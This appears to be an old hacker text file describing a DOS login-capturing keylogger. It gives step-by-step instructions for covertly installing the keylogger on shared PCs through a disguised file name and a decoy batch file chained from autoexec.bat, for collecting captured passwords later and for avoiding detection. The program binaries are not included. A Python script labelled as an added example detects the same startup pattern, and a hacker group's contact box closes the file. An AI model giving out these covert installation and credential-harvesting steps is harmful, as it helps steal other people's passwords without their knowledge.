 *** Evil Guru says: Make love not war ***

 L     OOO   GGG         CCC  AAA  PPPP  TTTTT U   U RRRR  EEEEE
 L    O   O G           C    A   A P   P   T   U   U R   R E
 L    O   O G  GG  ---  C    AAAAA PPPP    T   U   U RRRR  EEEEE
 L    O   O G   G       C    A   A P       T   U   U R R   E
 LLLL  OOO   GGG         CCC A   A P       T    UUU  R  RR EEEEE

 Written By:     Evil Guru

 Subject:        Login capture from PC-networks   


The login process can take several different shapes on networks. The dumbest
way is also the most common (as in many other situations). I refer to the
machines that boot up from their own hard drives. In such cases this program
may (and should) be used. It waits for the keystroke sequence
'L','O','G','I','N'.

When this happens it captures the contents of the next two typed lines,
which may be the LOGIN text and the PASSWORD text. The result is stored on the
hard drive in a hidden phile in the root of C:. The filename is ~G45DS32.TMP.
Normally a person who detects such a file deletes it, which we hope he
does rather than inspecting it. If he does inspect it he will see scancodes,
which differ from plain ASCII and make inspection more expert-demanding.

(I.e. no text editor could be used to inspect the text.)

To infect a computer:

Place the file logcap in some not-so-often-used directory with a nondescript
name. It must still have the .COM suffix.

In autoexec.bat, insert a row invoking the program. Perhaps it is safer
to invoke another .bat file called, say, 'EMSTEST.BAT' from autoexec and
let this file invoke our file with its full path.

Say that we place LOGIN.COM under windows with the name WIN286.COM.

Then we add a line in autoexec.bat that says:

@C:\EMSTEST

Then we create a file EMSTEST.BAT that says:

@C:\WINDOWS\WIN286.COM

(The whirlpool, @, suppresses a sort of text output that is unnecessary.)
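
Seen from the defending side, the setup above leaves two traces: a program
started through an extra batch hop from autoexec.bat, and the log file in the
root of C:. The following is an added example, not part of the original text;
it walks the startup chain and checks for both. The function names, the
in-memory file map and the sample data are assumptions constructed for the
example.

```python
LOG_NAME = "~G45DS32.TMP"  # capture file name stated in the text
BUILTINS = {"ECHO", "PATH", "SET", "REM", "PROMPT", "CLS", "CD", "IF", "GOTO"}

# Constructed sample: the startup files as the text sets them up.
SAMPLE_FILES = {
    r"C:\AUTOEXEC.BAT": "@ECHO OFF\nPATH C:\\DOS;C:\\WINDOWS\n@C:\\EMSTEST\n",
    r"C:\EMSTEST.BAT": "@C:\\WINDOWS\\WIN286.COM\n",
}
# Constructed sample: root directory listing taken with hidden files shown.
SAMPLE_ROOT = ["AUTOEXEC.BAT", "CONFIG.SYS", "EMSTEST.BAT", "~G45DS32.TMP"]


def audit_startup(files, start=r"C:\AUTOEXEC.BAT"):
    """Follow batch-to-batch hops from `start` and return every program
    that is launched from a batch file other than `start` itself."""
    files = {path.upper(): text for path, text in files.items()}
    findings, seen, stack = [], set(), [(start.upper(), 0)]
    while stack:
        batch, depth = stack.pop()
        if batch in seen or batch not in files:
            continue
        seen.add(batch)
        for raw in files[batch].splitlines():
            line = raw.strip()
            silenced = line.startswith("@")      # @ hides the command echo
            tokens = line.lstrip("@").split()
            if tokens and tokens[0].upper() == "CALL":
                tokens = tokens[1:]
            if not tokens or tokens[0].upper() in BUILTINS:
                continue
            target = tokens[0].upper()
            as_batch = target if target.endswith(".BAT") else target + ".BAT"
            if as_batch in files:                # another batch hop: follow it
                stack.append((as_batch, depth + 1))
            elif depth > 0:                      # program reached indirectly
                findings.append({"program": target, "via": batch, "silenced": silenced})
    return findings


def root_has_capture_file(root_listing):
    """True if the hidden log named in the text is present in the root of C:."""
    return any(name.upper() == LOG_NAME for name in root_listing)


if __name__ == "__main__":
    for hit in audit_startup(SAMPLE_FILES):
        print("indirect launch:", hit)
    print("capture file present:", root_has_capture_file(SAMPLE_ROOT))
```

The file name check only catches an unmodified copy; the indirect-launch
finding does not depend on any of the names used in the text.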

Here the LOGIN.COM file comes:




To examine the result a couple of days later the file EVAL.COM may be used.
Keep it on disk. When you enter the computer, put in the disk and type:
a:\eval.com. If the row is missing in autoexec.bat :~~( you must check whether
the LOGCAP file has also been deleted. If not, delete it and wait for some
weeks until you try again, for safety reasons.

Then the result is stored on the disk in CAPTURE.TXT, readable with a text
editor. The log file on the hard drive is erased and the computer is ready to
go on tracing logins. To stop the tracing on a computer you must change
autoexec.bat back and delete the LOGCAP.COM file (which you perhaps gave
another name).

Here comes EVAL.COM


Have phun !!!

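    +---------------------------------------------------------------+
    |         CONTACT ORGANIZED CONFUZION VIA VOICEMAIL             |
    |         -----------------------------------------             |
    |  UNITED STATES HEAD QUARTERS 1+212-415-0239 AFTER 22:00       |
    |  SWEDISH HEAD QUARTERS       020-795954 BOX : 336-2255        |
    +---------------------------------------------------------------+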
